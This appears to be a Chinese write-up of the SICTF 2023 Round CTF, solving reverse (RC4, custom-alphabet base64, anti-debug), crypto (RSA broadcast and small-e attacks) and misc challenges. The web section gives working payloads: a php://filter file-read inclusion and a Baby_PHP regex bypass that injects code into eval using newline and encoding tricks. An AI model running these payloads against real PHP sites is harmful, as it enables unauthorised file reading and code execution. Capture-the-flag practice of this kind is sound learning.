Reverse
[签到]PYC
电脑上的pycdc出问题了,就找个在线的
https://www.lddgo.net/string/pyc-compile-decompile
print('SICTF{07e278e7-9d66-4d90-88fc-8bd61e490616}')
Myobject
rc4加解密,写个脚本
def rc4(key, plaintext):
S = list(range(256))
j = 0
for i in range(256):
j = (j + S[i] + key[i % len(key)]) % 256
S[i], S[j] = S[j], S[i] # Swap values
i = 0
j = 0
output = []
for byte in plaintext:
i = (i + 1) % 256
j = (j + S[i]) % 256
S[i], S[j] = S[j], S[i]
K = S[(S[i] + S[j]) % 256]
output.append(byte ^ K)
return output
key = [ord(char) for char in "SIFLAG"]
v18_bytes = (0x47CF225A0ED32730).to_bytes(8, byteorder='little')
ciphertext_v19 = [71, 107, 11, 229, 141, 83, 186, 153, 195, 133, 7]
v20_bytes = (0x9F88FE10771C0107).to_bytes(8, byteorder='little')
full_ciphertext_27 = list(v18_bytes) + ciphertext_v19 + list(v20_bytes)
decrypted_full_combined = rc4(key, full_ciphertext_27)
decrypted_full_combined_string = ''.join([chr(byte) for byte in decrypted_full_combined])
print(decrypted_full_combined_string)
SICTF{wow_you_get_the_flag}
chbase
strcpy(Str2, "F0lWEVA7BmUzAGB0C2UuAU9hbnIpATEidDdnACQ9");
char *sub_411B30()
{
char *result; // eax
__CheckForDebuggerJustMyCode(&unk_41C0F5);
j_strcpy(&Destination, "ZYXWVUTSRQPONMLKJIHGFEDCBAabcdefghijklmnopqrstuvwxyz0123456789+/");
result = (char *)IsDebuggerPresent();
if ( result )
return j_strcpy(&Destination, "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/");
return result;
}
base64换一下上面的索引表就解出来了
http://web.chacuo.net/netbasex
SICTF{base64_and_antidebugger}
不一样的base64
这个出题人怎么对base64情有独钟
pyinstaller打包的exe,我找了几个提取pyc的项目,就这个比较好用
https://github.com/pyinstxtractor/pyinstxtractor-ng/releases/tag/2023.08.20
然后把111.pyc 反编译一下
https://www.lddgo.net/string/pyc-compile-decompile
# Visit https://www.lddgo.net/string/pyc-compile-decompile for more information
# Version : Python 3.8
BASE64_CHARS = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
def base64_encode(data):
binary_str = ''.join((lambda .0: for x in .0:
format(x, '08b'))(data))
padding = len(binary_str) % 24
if padding != 0:
binary_str += '0' * (24 - padding)
result = ''
for i in range(0, len(binary_str), 6):
group = binary_str[i:i + 6]
decimal_val = int(group, 2)
result += BASE64_CHARS[decimal_val]
padding_count = (4 - len(result) % 4) % 4
result += '=' * padding_count
return result
data = input('').encode()
encoded_data = base64_encode(data)
print(encoded_data)
if encoded_data == 'U0lDVEZ7OGUwZDM1OGQtOGI5ZC00ODY2LTliMDItNjc0OWIwN2FkMDlhfQAA':
print('True!')
这个是base64换表,用这个解密
http://web.chacuo.net/netbasex
SICTF{8e0d358d-8b9d-4866-9b02-6749b07ad09a}拿到flag
javacode
Crypto
[签到]古典大杂烩
emjoy编码,用这个解码http://www.atoolbox.net/Tool.php?Id=937
然后就不知道什么编码了,在搜索ctf编码识别的时候找到了这个项目
https://github.com/Ciphey/Ciphey 用这个项目解出了flag,这是docker版本的使用https://docs.remnux.org/run-tools-in-containers/remnux-containers#ciphey
SICTF{fe853b49-8730-462e-86f5-fc8e9789f077}
Radio
有三组n c,然后e比较小,用中国剩余定理求
import gmpy2
import binascii
# 利用中国剩余定理求解同余方程,aList:余数,mList:模数
def CRT(aList, mList):
M = 1
for i in mList:
M = M * i # 计算M = ∏ mi
x = 0
for i in range(len(mList)):
Mi = M // mList[i] # 计算Mi
Mi_inverse = gmpy2.invert(Mi, mList[i]) # 计算Mi的逆元
x += aList[i] * Mi * Mi_inverse # 构造x各项
x = x % M
return x
if __name__ == "__main__":
n1 = "14628911682936716611458501697007036859460044243525290515096052103585430459755335375005202100114469571371360084664887335211277585652711111523095037589648375630146039444071400098427638768750755153219974194380355807078158427824557754939604018020265955042573660474772006646525311705184431094905718137297923127124517126579859336516891364853724635334011666814712424599592662398013241607855160919361308195967978220182785816761656927836373944699635667244275310680450562446433724968942835275279255823144471582249379035668825437133182865600026935116686574740844588839352146024513673500770611055698030333734066230166111140083923"
n2 = "16756694748293603983474688536179571665757862433174984877308316444468003022266277794769268134195205510197588585566270416339902269736376811449830775290335951504698137924773942880807921752691668522662285163130340474205633998154849689387759453003838730282756734975490180702422176361373516245372635401939755527017589503572550811648345570775428936487145892225736625411540461653083957762795820510109891180906709827194217045059033312564525916136573856999724346161896146703174418039344166251503310869772735585554127509732135494936119159784702673291794381095696332128950979288440758815310482211285712819274848744478643590996499"
n3 = "12023158079717019193506148537498877243668782424904061914991928068483879707115315968983829360560644394409575645736275352836086080024994045582242629571839276759393418303915955798990522990081795218822313146157773272844272865701134880180795342597049645358985187689813369428579614193015028249821853347208001645148169449968882591709833452960545988520048722323580338213590245476892223967673180144525106292453573842357322398199104132677638909964034937501684668442732786408572501007756270725934445316827054687741612177409932320532825182104820899546084015733164816993674100635828218335112393003462442685677115798304835391938681"
c1 = "786426913645332991929803636719878643130489430090701482974255190570111407517277263761161970232982615374753982050075781017755721714929721429185828101898786972242994012456972241276851428750970754773002966788642795040933520662931514953660571657013642671173456750800960592586345219252277575624120271330470724245201080094330964145796872211627254805407394764183615099525852600855622089361965086460279057625205099471122036599934609091062009161119885692567925924978687256063116915630947838112126347748759078024890458539541208153526564434483654508834147071166870006117573542198238493913144419569943131642262575848786399020602"
c2 = "14269311999815379511888097227418748728398011595172649708273598243317106830139061994801598925448165045032084910971094414749744701731066555194159863759072739031915833091715422787808666326235589236328864675164322734119047182014621724868200908222400504845559290620275973427127376594365043386362821355037781568524903149101953873768462097165128186788759111090267131443645126715520994688945363059795513931799317608292977574376954729552861360597103229877031117089231816770880909815561950691603994439997197261395452797893557057320175747162837857668062550646101714062365530246698404923128445182100334335447738834779014705114350"
c3 = "3204718091370324153305164801961074660508922478706979436653573192321723216725523523538914956544950802616295043619768261075799875855502834749045520466140056621489305006966280527055668378303630674311102581232313032585389907028715671091914904062961720585667564982641321454541632782484415075257140508738041786400512095949826279576159569786734978545737717138115729502475357594151593143140355121154223614868465202149338507796306863351134218879326031985027900678671697876083351974546516576983143592764763925335805465720148057651958521255276602933604064541840892578409973858867533575728482926007556060584654853884046046420855"
cList = [int(c1), int(c2), int(c3)]
nList = [int(n1), int(n2), int(n3)]
m_e = CRT(cList, nList)
for e in range(17,18):
m, f = gmpy2.iroot(m_e, e)
m = hex(m)[2:]
if len(m) % 2 == 1:
m = m + '0'
flag = binascii.unhexlify(m)
print(flag)
SICTF{fdc0afb5-1c81-46b9-a28a-241f5f64419d}
small_e
from sympy import symbols, Eq, solve
n = 23407088262641313744603678186127228163189328033499381357614318160776774708961658114505773173784501557046914457908828086210961235530240151825359345210845219656000760996670856300710703016947799649686427460688236465568188205550456293373157997725204643414082796492333552579250010906010553831060540937802882205118399938918764313169385349293602085310111289583058965780887097301702677087443291977479125263301000328313103296364864396361278863921717374909215078711198899810620522933994481419395021233240234478331179727351050575360886334237633420906629984625441302945112631166021776379103081857393866576659121443879590011160797
e = 3
c = 1584727211980974717747362694412040878682966138197627512650829607105625096823456063149392973232737929737200028676411430124019573130595696272668927725536797627059576270068695792221537212669276826952363636924278717182163166234322320044764324434683614360641636360301452618063418349310497430566465329766916213742181
m1 = 11658736990073967239197168945911788935424691658202162501032766529463315401599017877851823976178979438592
c1 = pow(m1, e, n)
delta_m_symbol = symbols('delta_m')
polynomial_equation = Eq(c, (m1 + delta_m_symbol)**3)
solutions = solve(polynomial_equation, delta_m_symbol)
m_recovered = m1 + solutions[0]
print(bytes.fromhex(hex(m_recovered)[2:]).decode())
SICTF{2ca8e589-4a31-4909-80f0-9ecfc8f8cb37}
Web
[签到]Include
http://210.44.151.51:10120/?SICTF=php://filter/read=convert.base64-encode/resource=flag.php 读到下面内容
<?php
$file_path = "/flag";
if (file_exists($file_path)) {
$flag = file_get_contents($file_path);
}
else{
echo "error";
}
访问flag.php没有error,所以用伪协议读/flag 拿到flag
http://210.44.151.51:10120/?SICTF=php://filter/read=convert.base64-encode/resource=/flag
base64解码SICTF{f9bcd5bf-2e28-404c-936c-92d7f0ba2158}
Baby_PHP
highlight_file(__FILE__);
error_reporting(0);
$query = $_SERVER['QUERY_STRING'];
if (preg_match('/_|%5f|\.|%2E/i', $query)) {
die('You are Hacker!');
}
if($_GET['k_e_y'] !=='123' && preg_match('/^123$/',$_GET['k_e_y'])){
echo("You are will Win!<br>");
if(isset($_POST['command'])){
$command = $_POST['command'];
if(!preg_match("/\~|\`|\@|\#|\\$|\%|\&|\*|\(|\)|\-|\+|\=|\{|\}|\[|\]|\:|\'|\"|\,|\<|\.|\>|\/|\?|\\\\/i",$command)){
eval($command);
}
else{
echo("You are Hacker!");
}
}
}
else{
echo("K_e_y is Errors!");
}
这里第一个preg是可以用url编码代替下划线,然后第二个preg
$_GET[key]是强比较加后面的preg_match,搜了好久发现可以用换行符%0A绕过这个k%20e%20y=123%0A
command中preg那个这个圆括号是中文的圆括号,也就是说可以用函数,我一开始想着是system()然后去网上找些shell中的一些奇怪的技巧去绕过,然后发现关键的字符基本上都给过滤了,后面想了一下能用函数,那是不是可以用函数来替代原本该用shell操作的动作
在这篇文章里面找到了结果https://blog.csdn.net/qq_38154820/article/details/107171940?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522161461040516780255236081%2522%252C%2522scm%2522%253A%252220140713.130102334..%2522%257D&request_id=161461040516780255236081&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2allbaidu_landing_v2~default-1-107171940.pc_search_result_no_baidu_js&utm_term=%E6%97%A0%E5%8F%82%E6%95%B0%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96
最后的payload是
?k%20e%20y=123%0A
command=highlight_file(next(array_reverse(scandir(current(localeconv())))));
MISC
fast_morse
摩斯密码
..-. ..--- .- ----- ----. -... ..-. -....- --... ..-. ....- .- -....- ....- ..--- -.... ----. -....- ----. ...-- .- ..... -....- -.-. ---.. .- ....- ---.. ...-- -.... ----- -... ----- ...-- -.-.
SICTF{f2a09bf-7f4a-4269-93a5-c8a48360b03c}
标签:SICTF2023,SICTF,base64,Mi,flag,result,wp,net,Round
From: https://www.cnblogs.com/nyyyddddn/p/17691627.html